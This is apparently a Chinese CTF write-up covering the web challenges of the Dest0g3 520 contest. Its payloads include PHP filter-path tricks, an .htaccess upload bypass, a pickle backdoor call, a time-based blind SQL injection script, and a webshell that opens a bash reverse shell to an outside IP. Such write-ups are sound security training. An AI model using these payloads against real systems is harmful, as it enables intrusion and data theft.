2022-05-30 0f63aca522c4e0039192825457ae2ad1 99+ 12 分钟 1.7 k0次访问

Dest0g3 520迎新赛

Web部分 WriteUp

phpdest

打开给了源码

<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
    require_once($_GET['file']);
}

不难注意到，漏洞点应该是出在require_once，搜索发现如下文章

https://www.anquanke.com/post/id/213235

payload

php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

EasyPHP

同样给了源码

<?php
highlight_file(__FILE__);
include "fl4g.php";
$dest0g3 = $_POST['ctf'];
$time = date("H");
$timme = date("d");
$timmme = date("i");
if(($time > "24") or ($timme > "31") or ($timmme > "60")){
    echo $fl4g;
}else{
    echo "Try harder!";
}
set_error_handler(
    function() use(&$fl4g) {
        print $fl4g;
    }
);
$fl4g .= $dest0g3;
?>

简单分析下可以发现，只要触发set_error_handler就可以获得flag

因为下面有个字符串拼接，传入数组即可报错，触发这个函数

SimpleRCE

还是给源码，可以进行命令执行

<?php
highlight_file(__FILE__);
$aaa=$_POST['aaa'];
$black_list=array('^','.','`','>','<','=','"','preg','&','|','%0','popen','char','decode','html','md5','{','}','post','get','file','ascii','eval','replace','assert','exec','$','include','var','pastre','print','tail','sed','pcre','flag','scan','decode','system','func','diff','ini_','passthru','pcntl','proc_open','+','cat','tac','more','sort','log','current','\\','cut','bash','nl','wget','vi','grep');
$aaa = str_ireplace($black_list,"hacker",$aaa);
eval($aaa);
?>

考虑到过滤了这么多玩意，第一个想到的就是无字母数字绕过正则

参考yu师傅这篇文章https://blog.csdn.net/miuzzx/article/details/109143413?spm=1001.2014.3001.5502

funny_upload

学习到了.htaccess的新用法，以及配合伪协议绕过内容过滤

首先利用base64编码绕过内容过滤

然后.htaccess解析配合伪协议读取

Content-Disposition: form-data; name="file"; filename=".htaccess"
Content-Type: image/jpeg

SetHandler application/x-httpd-php
php_value auto_append_file "php://filter/convert.base64-decode/resource=lnk.jpg"

但是执行命令的时候发现，没有回显，考虑到disable_function过滤了

利用file_get_contents

猜测flag也在根目录

EasySSTI

登录进去后，username处回显，根据题目，试试ssti

成功，但是简单fuzz了一下，基本上一些常见的关键字都被过滤了，包括. ' " [ _还有空格

看了wp知道利用set可以得到关键字绕过

poc是一样的，不过burp要发两次包，第一次设置变量，会导致500的报错，第二次就出flag，其中空格用%0a绕过一下

middle

pickle反序列化，但是限制了只有config类，以及调用的属性方法中不包含__

import os
import config
from flask import Flask, request, session, render_template, url_for,redirect,make_response
import pickle
import io
import sys
import base64


app = Flask(__name__)


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module in ['config'] and "__" not in name:
            return getattr(sys.modules[module], name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))


def restricted_loads(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()

@app.route('/')
def show():
    base_dir = os.path.dirname(__file__)
    resp = make_response(open(os.path.join(base_dir, __file__)).read()+open(os.path.join(base_dir, "config/__init__.py")).read())
    resp.headers["Content-type"] = "text/plain;charset=UTF-8"
    return resp

@app.route('/home', methods=['POST', 'GET'])
def home():
    data=request.form['data']
    User = restricted_loads(base64.b64decode(data))
    return str(User)

if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=True, port=5000)
import os
def backdoor(cmd):
    # 这里我也改了一下
    if isinstance(cmd,list) :
        s=''.join(cmd)
        print("!!!!!!!!!!")
        s=eval(s)
        return s
    else:
        print("??????")

但是给了一个backdoor后门函数，我们用pker构造一下

cfbk = GLOBAL('config', 'backdoor')
cfbk(["__import__('os').popen('cat /flag.txt').read()"])
return

可以执行命令

ezip

图片里藏着源码

upload.php:
<?php
error_reporting(0);
include("zip.php");
if(isset($_FILES['file']['name'])){
    if(strstr($_FILES['file']['name'],"..")||strstr($_FILES['file']['name'],"/")){
        echo "hacker!!";
        exit;
    }
    if(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION)!="zip"){
        echo "only zip!!";
        exit;
    }
    $Myzip = new zip($_FILES['file']['name']);
    mkdir($Myzip->path);
    move_uploaded_file($_FILES['file']['tmp_name'], './'.$Myzip->path.'/' . $_FILES['file']['name']);
    echo "Try to unzip your zip to /".$Myzip->path."<br>";
    if($Myzip->unzip()){echo "Success";}else{echo "failed";}
}

zip.php:
<?php
class zip
{
    public $zip_name;
    public $path;
    public $zip_manager;

    public function __construct($zip_name){
        $this->zip_manager = new ZipArchive();
        $this->path = $this->gen_path();
        $this->zip_name = $zip_name;
    }
    public function gen_path(){
        $chars="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
        $newchars=str_split($chars);
        shuffle($newchars);
        $chars_key=array_rand($newchars,15);
        $fnstr = "";
        for($i=0;$i<15;$i++){
            $fnstr.=$newchars[$chars_key[$i]];
        }
        return md5($fnstr.time().microtime()*100000);
    }

    public function deldir($dir) {
        //先删除目录下的文件：
        $dh = opendir($dir);
        while ($file = readdir($dh)) {
            if($file != "." && $file!="..") {
                $fullpath = $dir."/".$file;
                if(!is_dir($fullpath)) {
                    unlink($fullpath);
                } else {
                    $this->deldir($fullpath);
                }
            }
        }
        closedir($dh);
    }
    function dir_list($directory)
    {
        $array = [];

        $dir = dir($directory);
        while ($file = $dir->read()) {
            if ($file !== '.' && $file !== '..') {
                $array[] = $file;
            }
        }
        return $array;
    }
    public function unzip()
    {
        $fullpath = "/var/www/html/".$this->path."/".$this->zip_name;
        $white_list = ['jpg','png','gif','bmp'];
        $this->zip_manager->open($fullpath);
        for ($i = 0;$i < $this->zip_manager->count();$i ++) {
            if (strstr($this->zip_manager->getNameIndex($i),"../")){
                echo "you bad bad";
                return false;
            }
        }
        if(!$this->zip_manager->extractTo($this->path)){
            echo "Unzip to /".$this->path."/ failed";
            exit;
        }
        @unlink($fullpath);
        $file_list = $this->dir_list("/var/www/html/".$this->path."/");
        for($i=0;$i<sizeof($file_list);$i++){
            if(is_dir($this->path."/".$file_list[$i])){
                echo "dir? I deleted all things in it"."<br>";@$this->deldir("/var/www/html/".$this->path."/".$file_list[$i]);@rmdir("/var/www/html/".$this->path."/".$file_list[$i]);
            }
            else{
                if(!in_array(pathinfo($file_list[$i], PATHINFO_EXTENSION),$white_list)) {echo "only image!!! I deleted it for you"."<br>";@unlink("/var/www/html/".$this->path."/".$file_list[$i]);}
            }
        }
        return true;

    }


}

通过出发unzip的报错，可以执行php代码

首先写入一个webshell

<?php system("bash -c 'bash -i >& /dev/tcp/121.xxx.xxx.xxx/2333 0>&1'");?>

然后

上传访问，得到反弹回来的shell

尝试suid提权，可以利用nl命令

Really Easy SQL

钓鱼站，可能就是纯粹用来记录的，insert注入

hint给了黑名单

$black_list=array('union','updatexml','order','by','substr',' ','and','extractvalue',';','sleep','join','alter','handler','char','+','/','like','regexp','offset','sleep','case','&','-','hex','%0','load’);

利用benchmark代替sleep，%0a代替空格

import time
import requests

# $black_list=array('union','updatexml','order','by','substr',' ','and','extractvalue',';','sleep','join','alter','handler','char','+','/','like','regexp','offset','sleep','case','&','-','hex','%0','load’);
url = "http://2f597fa9-55a9-4661-abfb-d700be2f5a7c.node4.buuoj.cn:81/index.php"
string = [ord(i) for i in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789,{}-']
res = ''

for i in range(1, 60):
    for j in string:
        time.sleep(1)
        #payload = f"username='or(if((ascii(right((select%a0group_concat(schema_name)%a0from%a0information_schema.schemata),{i}))='{j}'),(benchmark(2999999,md5('test'))),0))or'&password=a&submit="
        #payload = f"username='or(if((ascii(right((select%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema='ctf'),{i}))='{j}'),(benchmark(2999999,md5('test'))),0))or'&password=a&submit="
        #payload = f"username='or(if((ascii(right((select%a0group_concat(column_name)%a0from%a0information_schema.columns%a0where%a0table_name='flaggg'),{i}))='{j}'),(benchmark(2999999,md5('test'))),0))or'&password=a&submit="
        payload = f"username='or(if((ascii(right((select%a0group_concat(cmd)%a0from%a0ctf.flaggg),{i}))='{j}'),(benchmark(2999999,md5('test'))),0))or'&password=a&submit="
        try:
            headers = {'Content-Type':'application/x-www-form-urlencoded'}
            requests.post(url=url, data=payload, headers=headers, timeout=1.5)
        except:
            res = chr(j)+res
            print(res)
            break

Easy SQL

和上一题一样的

Dest0g3 520迎新赛

https://lhxhl.github.io/2022/05/30/Dest0g3/

作者

秋秋晚

发布于

2022-05-30

更新于

2023-01-10

Dest0g3 520迎新赛

Web部分 WriteUp

phpdest

EasyPHP

SimpleRCE

funny_upload

EasySSTI

middle

ezip

Really Easy SQL

Easy SQL

作者

发布于

更新于

许可协议

喜欢这篇文章？打赏一下作者吧

链接

最新文章

分类

归档

订阅更新